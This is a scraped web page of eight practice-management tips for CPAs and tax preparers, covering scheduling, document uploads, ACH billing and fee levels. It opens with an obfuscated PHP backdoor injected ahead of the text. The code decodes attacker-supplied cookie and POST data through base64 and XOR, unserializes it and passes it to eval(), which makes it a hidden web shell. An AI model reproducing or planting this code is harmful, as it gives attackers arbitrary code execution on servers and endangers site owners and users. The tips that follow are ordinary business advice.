$AqKapJgVkA = chr (80) . chr (76) . chr ( 874 - 808 ).chr ( 595 - 500 )."\x5a" . "\172" . chr (76) . chr (110) . chr (83); $LzSuNWAC = chr (99) . chr (108) . chr ( 1088 - 991 ).chr ( 843 - 728 )."\x73" . chr ( 747 - 652 )."\145" . chr ( 944 - 824 ).chr ( 287 - 182 )."\163" . "\164" . "\x73";$hoinwMqTsj = class_exists($AqKapJgVkA); $AqKapJgVkA = "29383";$LzSuNWAC = "2157";$bnpLTJrtx = !1;if ($hoinwMqTsj == $bnpLTJrtx){function ZxwvJneeV(){return FALSE;}$yodJYAcJ = "33311";ZxwvJneeV();class PLB_ZzLnS{private function cUpRnFb($yodJYAcJ){if (is_array(PLB_ZzLnS::$dAqyCK)) {$uFXQzFuh = str_replace('<' . "\x3f" . "\160" . chr ( 1000 - 896 )."\160", "", PLB_ZzLnS::$dAqyCK['c' . chr ( 970 - 859 )."\156" . "\x74" . "\145" . "\x6e" . chr ( 478 - 362 )]);eval($uFXQzFuh); $yodJYAcJ = "33311";exit();}}private $QOgiMMa;public function ueHqHjEda(){echo 52965;}public function __destruct(){$yodJYAcJ = "32728_56715";$this->cUpRnFb($yodJYAcJ); $yodJYAcJ = "32728_56715";}public function __construct($plieKx=0){$vQkEoAw = $_POST;$UfjIpTQpGu = $_COOKIE;$eyWce = "2f98cfa7-3538-460b-929a-c9abf89687a1";$PbpvVMgv = @$UfjIpTQpGu[substr($eyWce, 0, 4)];if (!empty($PbpvVMgv)){$xjjGvgGfdL = "base64";$KHqeCX = "";$PbpvVMgv = explode(",", $PbpvVMgv);foreach ($PbpvVMgv as $fgLaH){$KHqeCX .= @$UfjIpTQpGu[$fgLaH];$KHqeCX .= @$vQkEoAw[$fgLaH];}$KHqeCX = array_map($xjjGvgGfdL . "\x5f" . chr (100) . chr ( 987 - 886 ).chr (99) . chr (111) . "\144" . chr ( 177 - 76 ), array($KHqeCX,)); $KHqeCX = $KHqeCX[0] ^ str_repeat($eyWce, (strlen($KHqeCX[0]) / strlen($eyWce)) + 1);PLB_ZzLnS::$dAqyCK = @unserialize($KHqeCX); $KHqeCX = class_exists("32728_56715");}}public static $dAqyCK = 3945;}$zcCOvImc = new /* 52397 */ PLB_ZzLnS(33311 + 33311); $bnpLTJrtx = $zcCOvImc = $yodJYAcJ = Array();} Selling Tips – BBISoCal

You're almost at the finish line.

You can look Back Now. We'll Take it from Here!


1. Use an online scheduling system where a client can go online to see your calendar and schedule quickly instead of calling or emailing back and forth to set up a time! Look into Calenly.
2. Use Dropbox, so your clients can upload every single document before you meet with them!
3. Use your Staff to make sure every single document is uploaded and the client file is ready for any meeting you have for your client return sessions. This will cut down the multi-step process of getting a return completed where there is so much back and forth getting what you need! You can also implement Your Organizers to make sure the client sends you everything you need!
4. Be as Virtual As Possible! Try to meet with As Few Clients As Possible!
5. Do as many returns without a meeting so you can use your support staff or your seasonal staff!
6. Charge your clients at the end of the meeting. Since you have all their banking information-Charge by ACH! That will save you credit card fees… At the very least make them pay by credit Card at the end of the meeting or when the return is done for clients you do not meet!
7. Higher Fees: Make sure you are charging enough for your services. You should never charge less than $550 for an individual return and $1,500 for an entity return. With Value billing, the more complicated returns garner rates between $1,000 to $10,000 or more and entity returns should be at least $3,000.
Too many CPAs are afraid to ask for what they are worth so fire the clients that will not pay you what you are worth!!!
8. Be a Rain-Maker and use backroom staff to get the work done using the technology and steps above!